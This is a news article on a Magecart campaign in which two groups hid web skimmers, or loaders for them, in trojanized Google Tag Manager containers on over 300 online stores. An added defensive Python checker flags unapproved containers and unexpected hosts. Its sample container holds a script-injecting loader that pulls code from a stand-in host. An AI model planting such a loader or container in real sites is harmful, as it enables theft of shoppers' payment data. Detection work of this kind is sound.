Magecart Groups Exploit 300+ Sites via Trojanized Google Tag Manager Containers

The malicious campaign affected nearly 88,000 customers.

Gemini Advisory researchers have identified more than 300 e-commerce stores compromised via trojanized Google Tag Manager (GTM) containers as part of an ongoing Magecart campaign that began in March this year.

Threat actors abused a legitimate feature of the Google Tag Manager service to covertly plant malicious JavaScript known as a ‘web skimmer’, which siphons the bank details of online shoppers. The stolen data was later offered for sale on the dark web, Gemini analysts explained.

How was Google Tag Manager exploited?

Threat actors abused Google Tag Manager, a tool that helps online retailers understand customer behavior and dynamically update the tracking and analytics code on their sites. More specifically, the attacks abused GTM containers, a feature that packages and ships entire blocks of JavaScript code.

The hackers targeted e-commerce stores in a sophisticated manner: they designed their own GTM container, broke into the stores, and quietly deployed the malicious code without the owners’ knowledge.

The malicious code remained undetected for months because web security tools, and even website owners examining their own code, would have had a hard time distinguishing the malicious GTM container from the store’s own legitimate GTM tags. In total, this malicious campaign hit 316 online stores and nearly 88,000 customers, whose data was sold online, Gemini Advisory said.

After analyzing the campaign, Gemini analysts concluded that the attacks were performed by two different hacking groups. The first group embeds the entire malicious e-skimmer script in the container; the second places a loader inside the container that runs on the compromised site and loads the web skimmer through an intermediary step.
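The two detection problems the article describes, telling a store’s own GTM container apart from a planted one and spotting a container that merely loads a skimmer from an outside domain, can both be handled with a simple allowlist check. The following is an added example written for this page, not Gemini Advisory’s tooling or code from the campaign: it inventories the `GTM-` container IDs referenced in a captured page and flags any that are not on the store’s approved list, and separately scans the JavaScript of a container for hosts outside an expected set. The sample page, the container script, the container IDs and the `.invalid` host are all constructed here for illustration.

```python
import re

# GTM container IDs have the form GTM-XXXXXXX (uppercase letters and digits).
GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,10}\b")

# Absolute http(s) URLs; stops at whitespace, quotes, angle brackets or parentheses.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"<>()]*)?")

# Constructed sample: a store page whose legitimate container is GTM-STORE01,
# with a second, injected container tag appended near the end of <head>.
SAMPLE_PAGE = """
<head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],
j=d.createElement(s);j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;
f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-STORE01');</script>
<link rel="stylesheet" href="/static/shop.css">
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ZZ9INJ"></script>
</head>
"""

# Constructed sample: the body of a container that, besides a normal analytics call,
# pulls in a script from a host the store never approved (loader variant).
SAMPLE_CONTAINER_JS = """
(function(){ fetch('https://www.google-analytics.com/collect'); })();
var s=document.createElement('script');
s.src='https://cdn.example-analytics.invalid/lib.js';
document.head.appendChild(s);
"""

# Hosts a container is expected to talk to (assumption for this example).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}


def find_gtm_containers(html: str) -> set[str]:
    """Return every GTM container ID referenced anywhere in the page source."""
    return set(GTM_ID_RE.findall(html))


def unknown_containers(html: str, approved: set[str]) -> list[str]:
    """Container IDs present on the page but absent from the store's approved list."""
    return sorted(find_gtm_containers(html) - set(approved))


def external_hosts(script_text: str) -> set[str]:
    """Hostnames of all absolute URLs that appear in a container's JavaScript."""
    hosts = set()
    for url in URL_RE.findall(script_text):
        host = url.split("://", 1)[1].split("/", 1)[0].lower()
        hosts.add(host)
    return hosts


def unexpected_hosts(script_text: str, allowed: set[str]) -> list[str]:
    """Hosts contacted by the container that are not on the expected-hosts list."""
    return sorted(external_hosts(script_text) - set(allowed))


if __name__ == "__main__":
    approved_ids = {"GTM-STORE01"}
    print("containers on page:", sorted(find_gtm_containers(SAMPLE_PAGE)))
    print("unapproved containers:", unknown_containers(SAMPLE_PAGE, approved_ids))
    print("unexpected hosts in container:", unexpected_hosts(SAMPLE_CONTAINER_JS, ALLOWED_HOSTS))
```

Run against the constructed samples, the page check reports `GTM-ZZ9INJ` as unapproved and the container check reports `cdn.example-analytics.invalid`. In practice the approved container list comes from the store’s own GTM account, and the container JavaScript is the `gtm.js` response fetched for each ID found; the same check can be scheduled against the live storefront so that a newly injected container surfaces within hours rather than months.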

“Although the two GTM container variants involve similar tactics—storing e-skimmers within GTM containers or housing scripts in GTM containers that load e-skimmers from dual-use domains—analysis of the two variants suggests that two different Magecart groups are responsible for each variant,” the Gemini Advisory team explained in a blog post.

The first group performed two-thirds of all the hacks and started operations in March, while the second group began its operations in May. Both targeted e-commerce stores running on different platforms, including Magento, WordPress, Shopify, and BigCommerce. 

Smaller e-commerce shops were the most common target, since they often lack the resources or inclination to build robust security; only one of the affected stores had enough traffic to rank in the Alexa Top 50,000, the researchers said.

Gemini’s research was published after security firm RiskIQ revealed details of another web skimming attack targeting WordPress sites running the WooCommerce plugin. Additionally, security firm Sansec has published findings on multiple web skimming operations, highlighting a trend in which attackers are escalating from browser-side compromises to custom malware that they deploy on compromised sites at the server level.